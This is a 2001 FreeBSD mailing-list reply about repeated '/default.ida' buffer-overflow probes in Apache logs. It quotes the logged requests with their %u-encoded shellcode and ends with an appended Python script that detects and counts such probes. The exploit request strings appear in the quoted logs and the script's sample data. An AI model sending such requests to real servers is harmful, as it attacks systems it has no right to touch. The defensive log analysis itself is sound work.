Date:      Sat, 4 Aug 2001 20:18:50 -0400
From:      Louis LeBlanc <leblanc+freebsd@acadia.ne.mediaone.net>
To:        questions@FreeBSD.ORG
Subject:   Re: Attempted Buffer Overrun in via httpd?
Message-ID:  <20010804201849.A30510@acadia.ne.mediaone.net>
In-Reply-To: <E15T58n-000Ayh-00@jdl.com>
References:  <E15T58n-000Ayh-00@jdl.com>

--dDRMvlgZJXvWKvBx
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit

I got about 100 of these sent to my webmaster account as 404 warnings
before deciding to just block ports 80 and 443 for now.  It's gotten
to be a pain in the ass.  Looks like M$ bugs us *nix enthusiasts even
if we avoid them altogether :(

Check out the message I've attached, it shows pretty much the same
request.

I'm afraid to look at all the port 80 denials I'll be showing in my
logs now!

Lou

On 08/04/01 12:23 PM, Jon Loeliger sat at the `puter and typed:
> Folks,
> 
> I see a large number of httpd requests that look like this:
> 
>     211.41.175.10 - - [03/Aug/2001:23:49:55 -0500] "GET /default.ida?NNNNNN
>     NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>     NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>     NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>     NNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3
>     %u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=
>     a  HTTP/1.0" 400 316 "-" "-"
> 
> in my httpd access logs.  This just smells like an attempted buffer
> over run exploit at work.
> 
> Anyone recognize it and know anything about it?  Should I be worried?
> I'm running a current (right out of Ports) Apache here.
> 
> Thanks,
> jdl
> 

-- 
Louis LeBlanc       leblanc@acadia.ne.mediaone.net
Fully Funded Hobbyist, KeySlapper Extrordinaire :)
http://acadia.ne.mediaone.net                 Ô¿Ô¬

management, n.:
  The art of getting other people to do all the work.


--dDRMvlgZJXvWKvBx
Content-Type: message/rfc822
Content-Disposition: inline

X-Sieve: cmu-sieve 2.0
Return-Path: <nobody>
Received: (from nobody@localhost)
	by acadia.ne.mediaone.net (8.9.3/8.9.3) id KAA02193;
	Sat, 4 Aug 2001 10:03:37 -0400
Date: Sat, 4 Aug 2001 10:03:37 -0400
Message-Id: <200108041403.KAA02193@acadia.ne.mediaone.net>
To: webmaster@acadia.ne.mediaone.net
Subject: 404 Error Report
From: webmaster@acadia.ne.mediaone.net
Reply-To: webmaster@acadia.ne.mediaone.net
X-Mailer: PHP/4.0.4

404 Error Report

A 404 error was encountered by 65.96.250.172 on 8/4/2001 at 10:3.

The URI which generated the error is: 
http://acadia.ne.mediaone.net/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

The referring page was:




--dDRMvlgZJXvWKvBx--
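
A log triage script for the requests quoted in this thread, as an added example that is not part of the original messages: it flags access-log lines whose request targets an `.ida` path with a long single-character filler run followed by `%u`-encoded words, and counts them per client. The thresholds (64 filler characters, four `%u` groups), the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import Counter

# Common/combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) '
)
# Heuristics modelled on the quoted request (thresholds are assumptions):
# an .ida target, a long run of one filler letter, then %uXXXX-encoded words.
IDA_RE = re.compile(r'^[A-Z]+ \S*\.ida\?', re.I)
FILLER_RE = re.compile(r'\?(?P<ch>[A-Za-z])(?P=ch){63,}')
UENC_RE = re.compile(r'(?:%u[0-9a-fA-F]{4}){4,}')

def classify(line):
    """Return (ip, status, filler_char) for a matching probe, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.group('req')
    filler = FILLER_RE.search(req)
    if not (IDA_RE.match(req) and filler and UENC_RE.search(req)):
        return None
    return m.group('ip'), int(m.group('status')), filler.group('ch')

def summarize(lines):
    """Count probes per client and collect the status codes the server returned."""
    hits, statuses = Counter(), {}
    for line in lines:
        r = classify(line)
        if r:
            ip, status, _ = r
            hits[ip] += 1
            statuses.setdefault(ip, set()).add(status)
    return hits, statuses

# Constructed sample lines: filler length is illustrative, addresses are
# from documentation ranges, and the last two lines are benign controls.
PAYLOAD = "%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801"
SAMPLE = [
    f'192.0.2.10 - - [03/Aug/2001:23:49:55 -0500] "GET /default.ida?{"N" * 224}{PAYLOAD}%u00=a  HTTP/1.0" 400 316 "-" "-"',
    f'198.51.100.7 - - [04/Aug/2001:10:03:37 -0400] "GET /default.ida?{"X" * 224}{PAYLOAD}%u00=a HTTP/1.0" 404 290 "-" "-"',
    '192.0.2.10 - - [04/Aug/2001:10:05:00 -0400] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
    '203.0.113.5 - - [04/Aug/2001:10:06:00 -0400] "GET /search.ida?q=freebsd HTTP/1.0" 404 290 "-" "-"',
]

if __name__ == "__main__":
    hits, statuses = summarize(SAMPLE)
    for ip, n in hits.most_common():
        print(ip, n, sorted(statuses[ip]))
```

A 400 or 404 status on every flagged line, as in the two reports above, means the server rejected the request or had no such resource; any 200 in the per-client status set would be the line to investigate first.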
